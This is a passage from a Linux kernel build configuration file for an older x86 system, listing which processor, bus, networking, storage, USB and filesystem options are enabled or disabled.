CONFIG_X86_DEBUGCTLMSR=y # CONFIG_HPET_TIMER is not set CONFIG_DMI=y # CONFIG_IOMMU_HELPER is not set CONFIG_NR_CPUS=8 CONFIG_SCHED_SMT=y # CONFIG_SCHED_MC is not set CONFIG_PREEMPT_NONE=y # CONFIG_PREEMPT_VOLUNTARY is not set # CONFIG_PREEMPT is not set CONFIG_X86_LOCAL_APIC=y CONFIG_X86_IO_APIC=y # CONFIG_X86_MCE is not set CONFIG_VM86=y # CONFIG_TOSHIBA is not set # CONFIG_I8K is not set # CONFIG_X86_REBOOTFIXUPS is not set # CONFIG_MICROCODE is not set # CONFIG_X86_MSR is not set # CONFIG_X86_CPUID is not set CONFIG_NOHIGHMEM=y # CONFIG_HIGHMEM4G is not set # CONFIG_HIGHMEM64G is not set CONFIG_PAGE_OFFSET=0xC0000000 CONFIG_X86_PAE=y CONFIG_ARCH_FLATMEM_ENABLE=y CONFIG_ARCH_SPARSEMEM_ENABLE=y CONFIG_ARCH_SELECT_MEMORY_MODEL=y CONFIG_SELECT_MEMORY_MODEL=y CONFIG_FLATMEM_MANUAL=y # CONFIG_DISCONTIGMEM_MANUAL is not set # CONFIG_SPARSEMEM_MANUAL is not set CONFIG_FLATMEM=y CONFIG_FLAT_NODE_MEM_MAP=y CONFIG_SPARSEMEM_STATIC=y # CONFIG_SPARSEMEM_VMEMMAP_ENABLE is not set CONFIG_PAGEFLAGS_EXTENDED=y CONFIG_SPLIT_PTLOCK_CPUS=4 CONFIG_RESOURCES_64BIT=y CONFIG_ZONE_DMA_FLAG=1 CONFIG_BOUNCE=y CONFIG_VIRT_TO_BUS=y # CONFIG_MATH_EMULATION is not set # CONFIG_MTRR is not set # CONFIG_EFI is not set CONFIG_IRQBALANCE=y # CONFIG_SECCOMP is not set # CONFIG_HZ_100 is not set # CONFIG_HZ_250 is not set # CONFIG_HZ_300 is not set CONFIG_HZ_1000=y CONFIG_HZ=1000 # CONFIG_SCHED_HRTICK is not set # CONFIG_KEXEC is not set CONFIG_PHYSICAL_START=0x100000 # CONFIG_RELOCATABLE is not set CONFIG_PHYSICAL_ALIGN=0x100000 # CONFIG_HOTPLUG_CPU is not set # CONFIG_COMPAT_VDSO is not set # # Power management options # CONFIG_PM=y # CONFIG_PM_DEBUG is not set # CONFIG_SUSPEND is not set # CONFIG_HIBERNATION is not set CONFIG_ACPI=y CONFIG_ACPI_PROCFS=y CONFIG_ACPI_PROCFS_POWER=y CONFIG_ACPI_SYSFS_POWER=y CONFIG_ACPI_PROC_EVENT=y CONFIG_ACPI_AC=y CONFIG_ACPI_BATTERY=y CONFIG_ACPI_BUTTON=y CONFIG_ACPI_FAN=y CONFIG_ACPI_DOCK=y # CONFIG_ACPI_BAY is not set # CONFIG_ACPI_PROCESSOR is not set # CONFIG_ACPI_WMI is not set # CONFIG_ACPI_ASUS is not set # CONFIG_ACPI_TOSHIBA is not set CONFIG_ACPI_CUSTOM_DSDT_FILE="" # CONFIG_ACPI_CUSTOM_DSDT is not set CONFIG_ACPI_BLACKLIST_YEAR=0 # CONFIG_ACPI_DEBUG is not set CONFIG_ACPI_EC=y CONFIG_ACPI_POWER=y CONFIG_ACPI_SYSTEM=y CONFIG_X86_PM_TIMER=y # CONFIG_ACPI_CONTAINER is not set # CONFIG_ACPI_SBS is not set # # CPU Frequency scaling # # CONFIG_CPU_FREQ is not set # CONFIG_CPU_IDLE is not set # # Bus options (PCI etc.) # CONFIG_PCI=y # CONFIG_PCI_GOBIOS is not set # CONFIG_PCI_GOMMCONFIG is not set # CONFIG_PCI_GODIRECT is not set # CONFIG_PCI_GOOLPC is not set CONFIG_PCI_GOANY=y CONFIG_PCI_BIOS=y CONFIG_PCI_DIRECT=y CONFIG_PCI_MMCONFIG=y CONFIG_PCI_DOMAINS=y CONFIG_PCIEPORTBUS=y CONFIG_PCIEAER=y # CONFIG_PCIEASPM is not set CONFIG_ARCH_SUPPORTS_MSI=y # CONFIG_PCI_MSI is not set # CONFIG_PCI_LEGACY is not set # CONFIG_HT_IRQ is not set CONFIG_ISA_DMA_API=y # CONFIG_ISA is not set # CONFIG_MCA is not set # CONFIG_SCx200 is not set # CONFIG_OLPC is not set # CONFIG_PCCARD is not set # CONFIG_HOTPLUG_PCI is not set # # Executable file formats / Emulations # CONFIG_BINFMT_ELF=y # CONFIG_BINFMT_AOUT is not set # CONFIG_BINFMT_MISC is not set # # Networking # CONFIG_NET=y # # Networking options # CONFIG_PACKET=y CONFIG_PACKET_MMAP=y CONFIG_UNIX=y # CONFIG_NET_KEY is not set CONFIG_INET=y # CONFIG_IP_MULTICAST is not set # CONFIG_IP_ADVANCED_ROUTER is not set CONFIG_IP_FIB_HASH=y # CONFIG_IP_PNP is not set # CONFIG_NET_IPIP is not set # CONFIG_NET_IPGRE is not set # CONFIG_ARPD is not set # CONFIG_SYN_COOKIES is not set # CONFIG_INET_AH is not set # CONFIG_INET_ESP is not set # CONFIG_INET_IPCOMP is not set # CONFIG_INET_XFRM_TUNNEL is not set # CONFIG_INET_TUNNEL is not set # CONFIG_INET_XFRM_MODE_TRANSPORT is not set # CONFIG_INET_XFRM_MODE_TUNNEL is not set # CONFIG_INET_XFRM_MODE_BEET is not set # CONFIG_INET_LRO is not set # CONFIG_INET_DIAG is not set # CONFIG_TCP_CONG_ADVANCED is not set CONFIG_TCP_CONG_CUBIC=y CONFIG_DEFAULT_TCP_CONG="cubic" # CONFIG_TCP_MD5SIG is not set # CONFIG_IP_VS is not set CONFIG_IPV6=y CONFIG_IPV6_PRIVACY=y # CONFIG_IPV6_ROUTER_PREF is not set # CONFIG_IPV6_OPTIMISTIC_DAD is not set # CONFIG_INET6_AH is not set # CONFIG_INET6_ESP is not set # CONFIG_INET6_IPCOMP is not set # CONFIG_IPV6_MIP6 is not set # CONFIG_INET6_XFRM_TUNNEL is not set # CONFIG_INET6_TUNNEL is not set # CONFIG_INET6_XFRM_MODE_TRANSPORT is not set # CONFIG_INET6_XFRM_MODE_TUNNEL is not set # CONFIG_INET6_XFRM_MODE_BEET is not set # CONFIG_INET6_XFRM_MODE_ROUTEOPTIMIZATION is not set # CONFIG_IPV6_SIT is not set # CONFIG_IPV6_TUNNEL is not set # CONFIG_IPV6_MULTIPLE_TABLES is not set # CONFIG_IPV6_MROUTE is not set # CONFIG_NETLABEL is not set # CONFIG_NETWORK_SECMARK is not set CONFIG_NETFILTER=y # CONFIG_NETFILTER_DEBUG is not set # CONFIG_NETFILTER_ADVANCED is not set # # Core Netfilter Configuration # # CONFIG_NETFILTER_NETLINK_LOG is not set CONFIG_NF_CONNTRACK=y CONFIG_NF_CONNTRACK_FTP=y # CONFIG_NF_CONNTRACK_IRC is not set # CONFIG_NF_CONNTRACK_SIP is not set # CONFIG_NF_CT_NETLINK is not set CONFIG_NETFILTER_XTABLES=y # CONFIG_NETFILTER_XT_TARGET_MARK is not set # CONFIG_NETFILTER_XT_TARGET_NFLOG is not set # CONFIG_NETFILTER_XT_TARGET_TCPMSS is not set CONFIG_NETFILTER_XT_MATCH_CONNTRACK=y # CONFIG_NETFILTER_XT_MATCH_MARK is not set CONFIG_NETFILTER_XT_MATCH_STATE=y # # IP: Netfilter Configuration # CONFIG_NF_CONNTRACK_IPV4=y CONFIG_NF_CONNTRACK_PROC_COMPAT=y CONFIG_IP_NF_IPTABLES=y CONFIG_IP_NF_FILTER=y CONFIG_IP_NF_TARGET_REJECT=y CONFIG_IP_NF_TARGET_LOG=y # CONFIG_IP_NF_TARGET_ULOG is not set # CONFIG_NF_NAT is not set # CONFIG_IP_NF_MANGLE is not set # # IPv6: Netfilter Configuration # CONFIG_NF_CONNTRACK_IPV6=y CONFIG_IP6_NF_IPTABLES=y # CONFIG_IP6_NF_MATCH_IPV6HEADER is not set CONFIG_IP6_NF_FILTER=y CONFIG_IP6_NF_TARGET_LOG=y CONFIG_IP6_NF_TARGET_REJECT=y # CONFIG_IP6_NF_MANGLE is not set # CONFIG_IP_DCCP is not set # CONFIG_IP_SCTP is not set # CONFIG_TIPC is not set # CONFIG_ATM is not set # CONFIG_BRIDGE is not set # CONFIG_VLAN_8021Q is not set # CONFIG_DECNET is not set # CONFIG_LLC2 is not set # CONFIG_IPX is not set # CONFIG_ATALK is not set # CONFIG_X25 is not set # CONFIG_LAPB is not set # CONFIG_ECONET is not set # CONFIG_WAN_ROUTER is not set # CONFIG_NET_SCHED is not set # # Network testing # # CONFIG_NET_PKTGEN is not set # CONFIG_HAMRADIO is not set # CONFIG_CAN is not set # CONFIG_IRDA is not set # CONFIG_BT is not set # CONFIG_AF_RXRPC is not set # # Wireless # # CONFIG_CFG80211 is not set # CONFIG_WIRELESS_EXT is not set # CONFIG_MAC80211 is not set # CONFIG_IEEE80211 is not set # CONFIG_RFKILL is not set # CONFIG_NET_9P is not set # # Device Drivers # # # Generic Driver Options # CONFIG_UEVENT_HELPER_PATH="/sbin/hotplug" # CONFIG_STANDALONE is not set CONFIG_PREVENT_FIRMWARE_BUILD=y CONFIG_FW_LOADER=y # CONFIG_SYS_HYPERVISOR is not set # CONFIG_CONNECTOR is not set # CONFIG_MTD is not set # CONFIG_PARPORT is not set CONFIG_PNP=y # CONFIG_PNP_DEBUG is not set # # Protocols # CONFIG_PNPACPI=y CONFIG_BLK_DEV=y CONFIG_BLK_DEV_FD=y # CONFIG_BLK_CPQ_DA is not set # CONFIG_BLK_CPQ_CISS_DA is not set # CONFIG_BLK_DEV_DAC960 is not set # CONFIG_BLK_DEV_UMEM is not set # CONFIG_BLK_DEV_COW_COMMON is not set CONFIG_BLK_DEV_LOOP=y # CONFIG_BLK_DEV_CRYPTOLOOP is not set # CONFIG_BLK_DEV_NBD is not set # CONFIG_BLK_DEV_SX8 is not set # CONFIG_BLK_DEV_UB is not set # CONFIG_BLK_DEV_RAM is not set # CONFIG_CDROM_PKTCDVD is not set # CONFIG_ATA_OVER_ETH is not set # CONFIG_MISC_DEVICES is not set CONFIG_HAVE_IDE=y CONFIG_IDE=y CONFIG_BLK_DEV_IDE=y # # Please see Documentation/ide/ide.txt for help/info on IDE drives # # CONFIG_BLK_DEV_IDE_SATA is not set # CONFIG_BLK_DEV_IDEDISK is not set # CONFIG_IDEDISK_MULTI_MODE is not set CONFIG_BLK_DEV_IDECD=y CONFIG_BLK_DEV_IDECD_VERBOSE_ERRORS=y # CONFIG_BLK_DEV_IDETAPE is not set # CONFIG_BLK_DEV_IDEFLOPPY is not set # CONFIG_BLK_DEV_IDESCSI is not set # CONFIG_BLK_DEV_IDEACPI is not set # CONFIG_IDE_TASK_IOCTL is not set CONFIG_IDE_PROC_FS=y # # IDE chipset support/bugfixes # # CONFIG_IDE_GENERIC is not set # CONFIG_BLK_DEV_PLATFORM is not set # CONFIG_BLK_DEV_CMD640 is not set # CONFIG_BLK_DEV_IDEPNP is not set CONFIG_BLK_DEV_IDEDMA_SFF=y # # PCI IDE chipsets support # CONFIG_BLK_DEV_IDEPCI=y CONFIG_IDEPCI_PCIBUS_ORDER=y # CONFIG_BLK_DEV_GENERIC is not set # CONFIG_BLK_DEV_OPTI621 is not set # CONFIG_BLK_DEV_RZ1000 is not set CONFIG_BLK_DEV_IDEDMA_PCI=y # CONFIG_BLK_DEV_AEC62XX is not set # CONFIG_BLK_DEV_ALI15X3 is not set # CONFIG_BLK_DEV_AMD74XX is not set # CONFIG_BLK_DEV_ATIIXP is not set # CONFIG_BLK_DEV_CMD64X is not set # CONFIG_BLK_DEV_TRIFLEX is not set # CONFIG_BLK_DEV_CY82C693 is not set # CONFIG_BLK_DEV_CS5520 is not set # CONFIG_BLK_DEV_CS5530 is not set # CONFIG_BLK_DEV_CS5535 is not set # CONFIG_BLK_DEV_HPT34X is not set # CONFIG_BLK_DEV_HPT366 is not set # CONFIG_BLK_DEV_JMICRON is not set # CONFIG_BLK_DEV_SC1200 is not set CONFIG_BLK_DEV_PIIX=y # CONFIG_BLK_DEV_IT8213 is not set # CONFIG_BLK_DEV_IT821X is not set # CONFIG_BLK_DEV_NS87415 is not set # CONFIG_BLK_DEV_PDC202XX_OLD is not set # CONFIG_BLK_DEV_PDC202XX_NEW is not set # CONFIG_BLK_DEV_SVWKS is not set # CONFIG_BLK_DEV_SIIMAGE is not set # CONFIG_BLK_DEV_SIS5513 is not set # CONFIG_BLK_DEV_SLC90E66 is not set # CONFIG_BLK_DEV_TRM290 is not set # CONFIG_BLK_DEV_VIA82CXXX is not set # CONFIG_BLK_DEV_TC86C001 is not set CONFIG_BLK_DEV_IDEDMA=y # CONFIG_BLK_DEV_HD_ONLY is not set # CONFIG_BLK_DEV_HD is not set # # SCSI device support # # CONFIG_RAID_ATTRS is not set CONFIG_SCSI=y CONFIG_SCSI_DMA=y # CONFIG_SCSI_TGT is not set CONFIG_SCSI_NETLINK=y CONFIG_SCSI_PROC_FS=y # # SCSI support type (disk, tape, CD-ROM) # CONFIG_BLK_DEV_SD=y # CONFIG_CHR_DEV_ST is not set # CONFIG_CHR_DEV_OSST is not set # CONFIG_BLK_DEV_SR is not set CONFIG_CHR_DEV_SG=y # CONFIG_CHR_DEV_SCH is not set # # Some SCSI devices (e.g. CD jukebox) support multiple LUNs # CONFIG_SCSI_MULTI_LUN=y # CONFIG_SCSI_CONSTANTS is not set # CONFIG_SCSI_LOGGING is not set # CONFIG_SCSI_SCAN_ASYNC is not set CONFIG_SCSI_WAIT_SCAN=m # # SCSI Transports # # CONFIG_SCSI_SPI_ATTRS is not set CONFIG_SCSI_FC_ATTRS=y # CONFIG_SCSI_ISCSI_ATTRS is not set # CONFIG_SCSI_SAS_LIBSAS is not set # CONFIG_SCSI_SRP_ATTRS is not set CONFIG_SCSI_LOWLEVEL=y # CONFIG_ISCSI_TCP is not set # CONFIG_BLK_DEV_3W_XXXX_RAID is not set # CONFIG_SCSI_3W_9XXX is not set # CONFIG_SCSI_ACARD is not set # CONFIG_SCSI_AACRAID is not set # CONFIG_SCSI_AIC7XXX is not set # CONFIG_SCSI_AIC7XXX_OLD is not set # CONFIG_SCSI_AIC79XX is not set # CONFIG_SCSI_AIC94XX is not set # CONFIG_SCSI_DPT_I2O is not set # CONFIG_SCSI_ADVANSYS is not set # CONFIG_SCSI_ARCMSR is not set # CONFIG_MEGARAID_NEWGEN is not set # CONFIG_MEGARAID_LEGACY is not set # CONFIG_MEGARAID_SAS is not set # CONFIG_SCSI_HPTIOP is not set # CONFIG_SCSI_BUSLOGIC is not set # CONFIG_SCSI_DMX3191D is not set # CONFIG_SCSI_EATA is not set # CONFIG_SCSI_FUTURE_DOMAIN is not set # CONFIG_SCSI_GDTH is not set CONFIG_SCSI_IPS=y # CONFIG_SCSI_INITIO is not set # CONFIG_SCSI_INIA100 is not set # CONFIG_SCSI_MVSAS is not set # CONFIG_SCSI_STEX is not set # CONFIG_SCSI_SYM53C8XX_2 is not set # CONFIG_SCSI_QLOGIC_1280 is not set CONFIG_SCSI_QLA_FC=m # CONFIG_SCSI_QLA_ISCSI is not set # CONFIG_SCSI_LPFC is not set # CONFIG_SCSI_DC395x is not set # CONFIG_SCSI_DC390T is not set # CONFIG_SCSI_NSP32 is not set # CONFIG_SCSI_DEBUG is not set # CONFIG_SCSI_SRP is not set # CONFIG_ATA is not set CONFIG_MD=y # CONFIG_BLK_DEV_MD is not set CONFIG_BLK_DEV_DM=y # CONFIG_DM_DEBUG is not set # CONFIG_DM_CRYPT is not set # CONFIG_DM_SNAPSHOT is not set # CONFIG_DM_MIRROR is not set # CONFIG_DM_ZERO is not set # CONFIG_DM_MULTIPATH is not set # CONFIG_DM_DELAY is not set # CONFIG_DM_UEVENT is not set # CONFIG_FUSION is not set # # IEEE 1394 (FireWire) support # # # Enable only one of the two stacks, unless you know what you are doing # # CONFIG_FIREWIRE is not set # CONFIG_IEEE1394 is not set # CONFIG_I2O is not set # CONFIG_MACINTOSH_DRIVERS is not set CONFIG_NETDEVICES=y # CONFIG_NETDEVICES_MULTIQUEUE is not set # CONFIG_DUMMY is not set # CONFIG_BONDING is not set # CONFIG_MACVLAN is not set # CONFIG_EQUALIZER is not set # CONFIG_TUN is not set # CONFIG_VETH is not set # CONFIG_NET_SB1000 is not set # CONFIG_ARCNET is not set # CONFIG_NET_ETHERNET is not set CONFIG_NETDEV_1000=y # CONFIG_ACENIC is not set # CONFIG_DL2K is not set # CONFIG_E1000 is not set # CONFIG_E1000E is not set # CONFIG_E1000E_ENABLED is not set # CONFIG_IP1000 is not set # CONFIG_IGB is not set # CONFIG_NS83820 is not set # CONFIG_HAMACHI is not set # CONFIG_YELLOWFIN is not set # CONFIG_R8169 is not set # CONFIG_SIS190 is not set # CONFIG_SKGE is not set # CONFIG_SKY2 is not set # CONFIG_VIA_VELOCITY is not set CONFIG_TIGON3=y # CONFIG_BNX2 is not set # CONFIG_QLA3XXX is not set # CONFIG_ATL1 is not set # CONFIG_NETDEV_10000 is not set # CONFIG_TR is not set # # Wireless LAN # # CONFIG_WLAN_PRE80211 is not set # CONFIG_WLAN_80211 is not set # CONFIG_IWLWIFI_LEDS is not set # # USB Network Adapters # # CONFIG_USB_CATC is not set # CONFIG_USB_KAWETH is not set # CONFIG_USB_PEGASUS is not set # CONFIG_USB_RTL8150 is not set # CONFIG_USB_USBNET is not set # CONFIG_WAN is not set # CONFIG_FDDI is not set # CONFIG_HIPPI is not set # CONFIG_PPP is not set # CONFIG_SLIP is not set # CONFIG_NET_FC is not set # CONFIG_NETCONSOLE is not set # CONFIG_NETPOLL is not set # CONFIG_NET_POLL_CONTROLLER is not set # CONFIG_ISDN is not set # CONFIG_PHONE is not set # # Input device support # CONFIG_INPUT=y # CONFIG_INPUT_FF_MEMLESS is not set # CONFIG_INPUT_POLLDEV is not set # # Userland interfaces # CONFIG_INPUT_MOUSEDEV=y # CONFIG_INPUT_MOUSEDEV_PSAUX is not set CONFIG_INPUT_MOUSEDEV_SCREEN_X=1024 CONFIG_INPUT_MOUSEDEV_SCREEN_Y=768 # CONFIG_INPUT_JOYDEV is not set # CONFIG_INPUT_EVDEV is not set # CONFIG_INPUT_EVBUG is not set # # Input Device Drivers # CONFIG_INPUT_KEYBOARD=y CONFIG_KEYBOARD_ATKBD=y # CONFIG_KEYBOARD_SUNKBD is not set # CONFIG_KEYBOARD_LKKBD is not set # CONFIG_KEYBOARD_XTKBD is not set # CONFIG_KEYBOARD_NEWTON is not set # CONFIG_KEYBOARD_STOWAWAY is not set # CONFIG_INPUT_MOUSE is not set # CONFIG_INPUT_JOYSTICK is not set # CONFIG_INPUT_TABLET is not set # CONFIG_INPUT_TOUCHSCREEN is not set # CONFIG_INPUT_MISC is not set # # Hardware I/O ports # CONFIG_SERIO=y CONFIG_SERIO_I8042=y # CONFIG_SERIO_SERPORT is not set # CONFIG_SERIO_CT82C710 is not set CONFIG_SERIO_PCIPS2=y CONFIG_SERIO_LIBPS2=y # CONFIG_SERIO_RAW is not set # CONFIG_GAMEPORT is not set # # Character devices # CONFIG_VT=y CONFIG_VT_CONSOLE=y CONFIG_HW_CONSOLE=y # CONFIG_VT_HW_CONSOLE_BINDING is not set # CONFIG_DEVKMEM is not set # CONFIG_SERIAL_NONSTANDARD is not set # CONFIG_NOZOMI is not set # # Serial drivers # CONFIG_SERIAL_8250=y # CONFIG_SERIAL_8250_CONSOLE is not set CONFIG_FIX_EARLYCON_MEM=y CONFIG_SERIAL_8250_PCI=y CONFIG_SERIAL_8250_PNP=y CONFIG_SERIAL_8250_NR_UARTS=16 CONFIG_SERIAL_8250_RUNTIME_UARTS=4 # CONFIG_SERIAL_8250_EXTENDED is not set # # Non-8250 serial port support # CONFIG_SERIAL_CORE=y # CONFIG_SERIAL_JSM is not set CONFIG_UNIX98_PTYS=y # CONFIG_LEGACY_PTYS is not set # CONFIG_IPMI_HANDLER is not set # CONFIG_HW_RANDOM is not set # CONFIG_NVRAM is not set # CONFIG_R3964 is not set # CONFIG_APPLICOM is not set # CONFIG_SONYPI is not set # CONFIG_MWAVE is not set # CONFIG_PC8736x_GPIO is not set # CONFIG_NSC_GPIO is not set # CONFIG_CS5535_GPIO is not set # CONFIG_RAW_DRIVER is not set # CONFIG_HPET is not set # CONFIG_HANGCHECK_TIMER is not set # CONFIG_TCG_TPM is not set # CONFIG_TELCLOCK is not set CONFIG_DEVPORT=y # CONFIG_I2C is not set # CONFIG_SPI is not set # CONFIG_W1 is not set CONFIG_POWER_SUPPLY=y # CONFIG_POWER_SUPPLY_DEBUG is not set # CONFIG_PDA_POWER is not set # CONFIG_BATTERY_DS2760 is not set # CONFIG_HWMON is not set CONFIG_THERMAL=y # CONFIG_WATCHDOG is not set # # Sonics Silicon Backplane # CONFIG_SSB_POSSIBLE=y # CONFIG_SSB is not set # # Multifunction device drivers # # CONFIG_MFD_SM501 is not set # CONFIG_HTC_PASIC3 is not set # # Multimedia devices # # # Multimedia core support # # CONFIG_VIDEO_DEV is not set # CONFIG_DVB_CORE is not set # CONFIG_VIDEO_MEDIA is not set # # Multimedia drivers # # CONFIG_DAB is not set # # Graphics support # # CONFIG_AGP is not set # CONFIG_DRM is not set # CONFIG_VGASTATE is not set # CONFIG_VIDEO_OUTPUT_CONTROL is not set # CONFIG_FB is not set # CONFIG_BACKLIGHT_LCD_SUPPORT is not set # # Display device support # # CONFIG_DISPLAY_SUPPORT is not set # # Console display driver support # CONFIG_VGA_CONSOLE=y # CONFIG_VGACON_SOFT_SCROLLBACK is not set CONFIG_VIDEO_SELECT=y CONFIG_DUMMY_CONSOLE=y # # Sound # # CONFIG_SOUND is not set # CONFIG_HID_SUPPORT is not set CONFIG_USB_SUPPORT=y CONFIG_USB_ARCH_HAS_HCD=y CONFIG_USB_ARCH_HAS_OHCI=y CONFIG_USB_ARCH_HAS_EHCI=y CONFIG_USB=y # CONFIG_USB_DEBUG is not set # CONFIG_USB_ANNOUNCE_NEW_DEVICES is not set # # Miscellaneous USB options # # CONFIG_USB_DEVICEFS is not set # CONFIG_USB_DEVICE_CLASS is not set # CONFIG_USB_DYNAMIC_MINORS is not set # CONFIG_USB_SUSPEND is not set # CONFIG_USB_OTG is not set # # USB Host Controller Drivers # # CONFIG_USB_C67X00_HCD is not set CONFIG_USB_EHCI_HCD=y # CONFIG_USB_EHCI_ROOT_HUB_TT is not set # CONFIG_USB_EHCI_TT_NEWSCHED is not set # CONFIG_USB_ISP116X_HCD is not set # CONFIG_USB_ISP1760_HCD is not set # CONFIG_USB_OHCI_HCD is not set CONFIG_USB_UHCI_HCD=y # CONFIG_USB_SL811_HCD is not set # CONFIG_USB_R8A66597_HCD is not set # # USB Device Class drivers # # CONFIG_USB_ACM is not set # CONFIG_USB_PRINTER is not set # CONFIG_USB_WDM is not set # # NOTE: USB_STORAGE enables SCSI, and 'SCSI disk support' # # # may also be needed; see USB_STORAGE Help for more information # CONFIG_USB_STORAGE=y # CONFIG_USB_STORAGE_DEBUG is not set # CONFIG_USB_STORAGE_DATAFAB is not set # CONFIG_USB_STORAGE_FREECOM is not set # CONFIG_USB_STORAGE_ISD200 is not set # CONFIG_USB_STORAGE_DPCM is not set # CONFIG_USB_STORAGE_USBAT is not set # CONFIG_USB_STORAGE_SDDR09 is not set # CONFIG_USB_STORAGE_SDDR55 is not set # CONFIG_USB_STORAGE_JUMPSHOT is not set # CONFIG_USB_STORAGE_ALAUDA is not set # CONFIG_USB_STORAGE_ONETOUCH is not set # CONFIG_USB_STORAGE_KARMA is not set # CONFIG_USB_STORAGE_CYPRESS_ATACB is not set # CONFIG_USB_LIBUSUAL is not set # # USB Imaging devices # # CONFIG_USB_MDC800 is not set # CONFIG_USB_MICROTEK is not set # CONFIG_USB_MON is not set # # USB port drivers # # CONFIG_USB_SERIAL is not set # # USB Miscellaneous drivers # # CONFIG_USB_EMI62 is not set # CONFIG_USB_EMI26 is not set # CONFIG_USB_ADUTUX is not set # CONFIG_USB_AUERSWALD is not set # CONFIG_USB_RIO500 is not set # CONFIG_USB_LEGOTOWER is not set # CONFIG_USB_LCD is not set # CONFIG_USB_BERRY_CHARGE is not set # CONFIG_USB_LED is not set # CONFIG_USB_CYPRESS_CY7C63 is not set # CONFIG_USB_CYTHERM is not set # CONFIG_USB_PHIDGET is not set # CONFIG_USB_IDMOUSE is not set # CONFIG_USB_FTDI_ELAN is not set # CONFIG_USB_APPLEDISPLAY is not set # CONFIG_USB_SISUSBVGA is not set # CONFIG_USB_LD is not set # CONFIG_USB_TRANCEVIBRATOR is not set # CONFIG_USB_IOWARRIOR is not set # CONFIG_USB_ISIGHTFW is not set # CONFIG_USB_GADGET is not set # CONFIG_MMC is not set # CONFIG_MEMSTICK is not set # CONFIG_NEW_LEDS is not set # CONFIG_ACCESSIBILITY is not set # CONFIG_INFINIBAND is not set # CONFIG_EDAC is not set CONFIG_RTC_LIB=y CONFIG_RTC_CLASS=y CONFIG_RTC_HCTOSYS=y CONFIG_RTC_HCTOSYS_DEVICE="rtc0" # CONFIG_RTC_DEBUG is not set # # RTC interfaces # CONFIG_RTC_INTF_SYSFS=y CONFIG_RTC_INTF_PROC=y CONFIG_RTC_INTF_DEV=y # CONFIG_RTC_INTF_DEV_UIE_EMUL is not set # CONFIG_RTC_DRV_TEST is not set # # SPI RTC drivers # # # Platform RTC drivers # # CONFIG_RTC_DRV_CMOS is not set # CONFIG_RTC_DRV_DS1511 is not set # CONFIG_RTC_DRV_DS1553 is not set # CONFIG_RTC_DRV_DS1742 is not set # CONFIG_RTC_DRV_STK17TA8 is not set # CONFIG_RTC_DRV_M48T86 is not set # CONFIG_RTC_DRV_M48T59 is not set # CONFIG_RTC_DRV_V3020 is not set # # on-CPU RTC drivers # # CONFIG_DMADEVICES is not set # CONFIG_UIO is not set # # Firmware Drivers # # CONFIG_EDD is not set # CONFIG_DELL_RBU is not set # CONFIG_DCDBAS is not set # CONFIG_DMIID is not set # CONFIG_ISCSI_IBFT_FIND is not set # # File systems # # CONFIG_EXT2_FS is not set # CONFIG_EXT3_FS is not set # CONFIG_EXT4DEV_FS is not set CONFIG_REISERFS_FS=y # CONFIG_REISERFS_CHECK is not set # CONFIG_REISERFS_PROC_INFO is not set CONFIG_REISERFS_FS_XATTR=y CONFIG_REISERFS_FS_POSIX_ACL=y CONFIG_REISERFS_FS_SECURITY=y # CONFIG_JFS_FS is not set CONFIG_FS_POSIX_ACL=y # CONFIG_XFS_FS is not set # CONFIG_OCFS2_FS is not set # CONFIG_DNOTIFY is not set # CONFIG_INOTIFY is not set # CONFIG_QUOTA is not set # CONFIG_AUTOFS_FS is not set # CONFIG_AUTOFS4_FS is not set # CONFIG_FUSE_FS is not set # # CD-ROM/DVD Filesystems # CONFIG_ISO9660_FS=y CONFIG_JOLIET=y CONFIG_ZISOFS=y CONFIG_UDF_FS=y CONFIG_UDF_NLS=y # # DOS/FAT/NT Filesystems # # CONFIG_MSDOS_FS is not set # CONFIG_VFAT_FS is not set # CONFIG_NTFS_FS is not set # # Pseudo filesystems # CONFIG_PROC_FS=y CONFIG_PROC_KCORE=y CONFIG_PROC_SYSCTL=y CONFIG_SYSFS=y # CONFIG_TMPFS is not set # CONFIG_HUGETLBFS is not set # CONFIG_HUGETLB_PAGE is not set # CONFIG_CONFIGFS_FS is not set # # Miscellaneous filesystems # # CONFIG_ADFS_FS is not set # CONFIG_AFFS_FS is not set # CONFIG_ECRYPT_FS is not set # CONFIG_HFS_FS is not set # CONFIG_HFSPLUS_FS is not set # CONFIG_BEFS_FS is not set # CONFIG_BFS_FS is not set # CONFIG_EFS_FS is not set # CONFIG_CRAMFS is not set # CONFIG_VXFS_FS is not set # CONFIG_MINIX_FS is not set # CONFIG_HPFS_FS is not set # CONFIG_QNX4FS_FS is not set # CONFIG_ROMFS_FS is not set # CONFIG_SYSV_FS is not set # CONFIG_UFS_FS is not set # CONFIG_NETWORK_FILESYSTEMS is not set # # Partition Types # CONFIG_PARTITION_ADVANCED=y CONFIG_ACORN_PARTITION=y # CONFIG_ACORN_PARTITION_CUMANA is not set # CONFIG_ACORN_PARTITION_EESOX is not set CONFIG_ACORN_PARTITION_ICS=y # CONFIG_ACORN_PARTITION_ADFS is not set # CONFIG_ACORN_PARTITION_POWERTEC is not set CONFIG_ACORN_PARTITION_RISCIX=y CONFIG_OSF_PARTITION=y CONFIG_AMIGA_PARTITION=y CONFIG_ATARI_PARTITION=y CONFIG_MAC_PARTITION=y CONFIG_MSDOS_PARTITION=y CONFIG_BSD_DISKLABEL=y CONFIG_MINIX_SUBPARTITION=y CONFIG_SOLARIS_X86_PARTITION=y CONFIG_UNIXWARE_DISKLABEL=y CONFIG_LDM_PARTITION=y # CONFIG_LDM_DEBUG is not set CONFIG_SGI_PARTITION=y CONFIG_ULTRIX_PARTITION=y CONFIG_SUN_PARTITION=y CONFIG_KARMA_PARTITION=y CONFIG_EFI_PARTITION=y # CONFIG_SYSV68_PARTITION is not set CONFIG_NLS=y CONFIG_NLS_DEFAULT="iso8859-1" # CONFIG_NLS_CODEPAGE_437 is not set # CONFIG_NLS_CODEPAGE_737 is not set # CONFIG_NLS_CODEPAGE_775 is not set # CONFIG_NLS_CODEPAGE_850 is not set # CONFIG_NLS_CODEPAGE_852 is not set # CONFIG_NLS_CODEPAGE_855 is not set # CONFIG_NLS_CODEPAGE_857 is not set # CONFIG_NLS_CODEPAGE_860 is not set # CONFIG_NLS_CODEPAGE_861 is not set # CONFIG_NLS_CODEPAGE_862 is not set # CONFIG_NLS_CODEPAGE_863 is not set # CONFIG_NLS_CODEPAGE_864 is not set # CONFIG_NLS_CODEPAGE_865 is not set # CONFIG_NLS_CODEPAGE_866 is not set # CONFIG_NLS_CODEPAGE_869 is not set # CONFIG_NLS_CODEPAGE_936 is not set # CONFIG_NLS_CODEPAGE_950 is not set # CONFIG_NLS_CODEPAGE_932 is not set # 